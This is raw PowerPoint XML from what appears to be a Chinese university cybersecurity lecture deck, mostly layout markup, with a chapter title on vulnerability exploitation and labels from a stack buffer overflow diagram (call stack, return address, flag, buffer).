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6" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="335" r:id="rId5"/>
    <p:sldId id="461" r:id="rId6"/>
    <p:sldId id="460" r:id="rId7"/>
    <p:sldId id="307" r:id="rId8"/>
    <p:sldId id="462" r:id="rId9"/>
    <p:sldId id="364" r:id="rId10"/>
    <p:sldId id="463" r:id="rId11"/>
    <p:sldId id="465" r:id="rId12"/>
    <p:sldId id="466" r:id="rId13"/>
    <p:sldId id="371" r:id="rId14"/>
    <p:sldId id="467" r:id="rId15"/>
    <p:sldId id="468" r:id="rId16"/>
    <p:sldId id="469" r:id="rId17"/>
    <p:sldId id="395" r:id="rId18"/>
    <p:sldId id="373" r:id="rId19"/>
    <p:sldId id="470" r:id="rId20"/>
    <p:sldId id="471" r:id="rId21"/>
    <p:sldId id="472" r:id="rId22"/>
    <p:sldId id="473" r:id="rId23"/>
    <p:sldId id="474" r:id="rId24"/>
    <p:sldId id="475" r:id="rId25"/>
    <p:sldId id="476" r:id="rId26"/>
    <p:sldId id="477" r:id="rId27"/>
    <p:sldId id="388" r:id="rId28"/>
    <p:sldId id="390" r:id="rId29"/>
    <p:sldId id="479" r:id="rId30"/>
    <p:sldId id="391" r:id="rId31"/>
    <p:sldId id="392" r:id="rId32"/>
    <p:sldId id="397" r:id="rId33"/>
    <p:sldId id="409" r:id="rId34"/>
    <p:sldId id="480" r:id="rId35"/>
    <p:sldId id="481" r:id="rId36"/>
    <p:sldId id="410" r:id="rId37"/>
    <p:sldId id="394" r:id="rId38"/>
    <p:sldId id="411" r:id="rId39"/>
    <p:sldId id="442" r:id="rId40"/>
    <p:sldId id="443" r:id="rId41"/>
    <p:sldId id="445" r:id="rId42"/>
    <p:sldId id="446" r:id="rId43"/>
    <p:sldId id="482" r:id="rId44"/>
    <p:sldId id="448" r:id="rId45"/>
    <p:sldId id="447" r:id="rId46"/>
    <p:sldId id="438" r:id="rId47"/>
    <p:sldId id="452" r:id="rId48"/>
    <p:sldId id="483" r:id="rId49"/>
    <p:sldId id="453" r:id="rId50"/>
    <p:sldId id="454" r:id="rId51"/>
    <p:sldId id="455" r:id="rId52"/>
    <p:sldId id="456" r:id="rId53"/>
    <p:sldId id="457" r:id="rId54"/>
    <p:sldId id="484" r:id="rId55"/>
    <p:sldId id="485" r:id="rId56"/>
    <p:sldId id="412" r:id="rId57"/>
    <p:sldId id="413" r:id="rId58"/>
    <p:sldId id="487" r:id="rId59"/>
    <p:sldId id="439" r:id="rId60"/>
    <p:sldId id="417" r:id="rId61"/>
    <p:sldId id="419" r:id="rId62"/>
    <p:sldId id="420" r:id="rId63"/>
    <p:sldId id="421" r:id="rId64"/>
    <p:sldId id="422" r:id="rId65"/>
    <p:sldId id="423" r:id="rId66"/>
    <p:sldId id="427" r:id="rId67"/>
    <p:sldId id="424" r:id="rId68"/>
    <p:sldId id="425" r:id="rId69"/>
    <p:sldId id="428" r:id="rId70"/>
    <p:sldId id="426" r:id="rId71"/>
    <p:sldId id="430" r:id="rId72"/>
    <p:sldId id="431" r:id="rId73"/>
    <p:sldId id="429" r:id="rId74"/>
    <p:sldId id="433" r:id="rId75"/>
    <p:sldId id="435" r:id="rId76"/>
    <p:sldId id="440" r:id="rId77"/>
    <p:sldId id="488" r:id="rId78"/>
    <p:sldId id="489" r:id="rId79"/>
    <p:sldId id="437" r:id="rId80"/>
    <p:sldId id="490"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83" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="7197" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="436" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="663" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="3704" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="3976" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" orient="horz" pos="3974" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10"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AA"/>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06" autoAdjust="0"/>
    <p:restoredTop sz="95911" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="144" d="100"/>
          <a:sy n="144" d="100"/>
        </p:scale>
        <p:origin x="904" y="192"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="483"/>
        <p:guide pos="7197"/>
        <p:guide orient="horz" pos="436"/>
        <p:guide orient="horz" pos="663"/>
        <p:guide pos="3704"/>
        <p:guide pos="3976"/>
        <p:guide orient="horz" pos="397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4606C-EB1E-D443-AFDD-3F29AB4D154C}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/11/29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EF20F-F223-2C45-BD7A-9B601D3BF613}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370479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a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15775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39</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71755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56</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527516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64</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2369602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67</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1140592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70</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388423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71</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57385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72</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4282989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73</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1856439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80</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22588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2</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366852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9</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299236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10</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308221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11</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121294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12</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47156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35</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135725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36</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360973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8EF20F-F223-2C45-BD7A-9B601D3BF613}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272006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2B6AE6-0F78-6216-7AF5-6726399100A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39FD6AA-30F6-5C3F-3EE7-BFE6D7006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7D73BDC-A4BD-9A30-7BCE-2AC3253523A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FC9F2575-E4B1-62FC-49C1-D118102C36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1AB958-84FF-7365-C691-A4EEC19CEE7B}"/>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1484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9D4E8-11CA-748C-E6FA-F60C19341BA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8CB8633-D854-E50B-1F48-AA06C2FF316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88B8BA-4113-B51C-B860-F9E9A7302FAC}"/>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F8B34A8F-DC4B-62B4-D121-926134BB22B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FBCF73-8D2C-1252-CFF3-9E6524F4D24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9021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E20C33-B5DD-2C39-5F2E-DCB44066B8A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8E8FDD-1E9A-1EE8-21A2-DC3D54BA297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DB63C5-D405-3606-AAFB-2108B66318E9}"/>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592D0286-14EA-D689-9044-91218E9C80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C568CF9-D404-6E30-F1CB-233CAABDCB81}"/>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233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1455A-0381-580A-1512-4A43DDC4752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EF51B62-823F-8534-7029-FA440854B24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0C4D083-FC02-2E0E-91A8-1E613727C0B1}"/>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A998AA93-685B-5403-AED1-1F68972106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5C291AD-326E-E68E-9370-AB9BDA8CB2C7}"/>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9688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F2707-1E3B-F096-4565-4C2A12B50B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BCEA78D-A3F2-E6BE-B1A2-ADC90771C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65AA955-DC17-4C52-A1FF-5832A7DF9C54}"/>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84760B18-19F3-8165-3D80-3DD95429CF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70D414-5E19-33F9-51C9-211E5B9E7EC0}"/>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6142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13DD8-7D99-7BCA-D8AF-DFF466D3B2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F26F3-0A0C-AB47-FF95-1CF190C60C0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351614-A679-C947-0E0F-77A50468DE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628822F-01AB-6193-1A8B-B6784EE12528}"/>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4AF8F26C-AA96-2C7B-5631-1305F37F411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33879A-3C14-EB9F-A839-EBFC32FD11EA}"/>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75676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5349D-E202-2C02-0382-535D61A5662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8FF55E9-8109-9888-2DCC-44F00C3E9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A2C91B-52FD-49CC-6AA7-3D5920121A9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FDDCEE6-A8BE-4137-9ECB-70383E86B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24737B7-56A9-D671-B733-DF8509E9895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A3D82F-91CC-385C-0777-DAF8A941A7AF}"/>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8" name="页脚占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1CB569B-474D-6405-A6C4-08057754B7A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A8B5387-079D-B16D-B803-90DC74A41AD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66014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8D2CD-54A7-2DDC-CBDB-51FDBCE67B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A424421-1F2B-7486-9EF3-9F3961EDCF6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4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FBAAB8-D5DE-AD62-A264-F7B1D04A5EF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6D0F212-F2F2-F467-403B-4C1773BF887C}"/>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76450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4CB6A-FCB8-2D0A-385F-4EFC50AF38A8}"/>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3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9001FC97-2266-4F43-8729-6AB80A583A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0BDCAF6-F299-C3D9-AB84-F55DBAC29846}"/>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27337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A83D-911B-A357-486D-796AC1222A6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4C0E27E-BF89-9366-21C4-F7B2CB74B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E240773-406F-D374-8C7E-23BBB49B0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9A8C860-ABB5-7C79-9487-E2CB460F9555}"/>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91415829-FC76-4E8D-8180-810534CCC2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D682E-520C-2823-AA74-A7E8325354DE}"/>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255693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2020-9BCF-7134-49AC-3D36752AE9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9015984-6599-2277-5674-0804C6681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82FF0A7-1A97-75ED-8FF5-EA2899446B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726016E-67A5-5CB1-0EB7-48BE089CC176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{93FF2699-7A0A-C748-ACC7-2CAB77C14AF5}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/11/29</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAB8054-A422-F0ED-31B7-AF0ABCBA1E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D560F8-345C-E5DF-353C-1F6E477790AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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488916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E06723-332C-8C86-7560-43ECD5427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A01A93-A620-5A44-A80E-BD970CD56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7FD547B-4816-5359-90FB-BBDE72FE7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2699-7A0A-C748-ACC7-2CAB77C14AF5}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/11/29</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2DEF939-18F5-DF28-5A64-3D631337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E8E8157-0AF9-E930-04DE-E119BD672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AE69-AE0C-9344-8225-14641FCC96A0}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387453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4.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId16"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4.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag51.xml"/><Relationship Id="rId16"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image" Target="../media/image4.tmp"/><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893B42B-EB02-E974-F41C-D271ED5846AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1720054"/>
            <a:ext cx="12192000" cy="2376264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0048A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7200">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第五章 漏洞利用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="7200" dirty="0">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F9170737-CA4B-58BC-9907-AF6EBCE843D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080337" y="4221088"/>
            <a:ext cx="2031325" cy="1135054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>天津大学 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络安全学院</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278367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2533322"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verify</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数调用栈</a:t>
            </a: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利用思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7F3EEC-A829-774B-DD7C-0E4D6F2AD0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="1989454"/>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634405ED-77B7-8900-3819-0DC4A06E6C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022617" y="2008830"/>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9" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE5A80F-0D98-57BF-F8F3-AC3B2FEB4263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7026098" y="554099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21" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21C3DA8-E8F8-B316-DE0E-4876DECD1504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="273343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2C92651-8B81-11E6-B322-8890A9A429E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051485" y="2363949"/>
            <a:ext cx="1428888" cy="375428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525D05F3-BF4D-E0A8-83C8-969ED09F55D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8296865" y="2754158"/>
            <a:ext cx="926857"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old</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4" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A7660E4-D29A-FEB0-5F21-D0C1FE3EDB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040214" y="310133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E0CE531-ECDC-0FEF-010E-29B0690DEADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482813" y="3123649"/>
            <a:ext cx="554960"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flag</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6" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63731B68-A5C3-60EF-683C-5D1ECF9D6037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="346220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410DE025-7AFF-8E9E-070F-2227F954C46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028412" y="3491150"/>
            <a:ext cx="148630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buffer[40-43]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8" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76D3B40-6271-E7B3-A4E0-2598B662958F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="38553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124325F-F894-BA79-5627-0C5FB7AA3303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9919439" y="2762783"/>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箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64C80A6-648B-A7B7-DBC3-48A8E5C2473F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9651517" y="2923435"/>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DBA1C1F-3ED4-E371-451F-36EF1DB13226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984432" y="5563979"/>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箭头连接符 32">
            <a:extLst>
